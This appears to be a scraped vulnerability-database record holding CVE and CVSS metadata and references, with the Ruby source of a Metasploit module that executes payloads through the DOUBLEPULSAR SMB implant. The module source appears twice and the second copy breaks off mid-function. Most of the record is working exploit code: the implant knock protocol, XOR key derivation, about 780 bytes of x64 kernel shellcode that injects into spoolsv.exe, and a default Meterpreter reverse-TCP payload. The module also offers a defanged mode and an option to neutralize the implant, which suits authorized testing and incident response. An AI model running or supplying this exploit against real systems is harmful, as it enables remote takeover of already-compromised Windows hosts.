if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-06] #"}, "lastseen": "2021-09-05T22:11:21", "differentElements": ["sourceData"], "edition": 8}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "8ed87ee3e71e41e2d1dc834e9b156160", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-07T06:18:11", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-07T06:18:11", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-07T06:18:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def 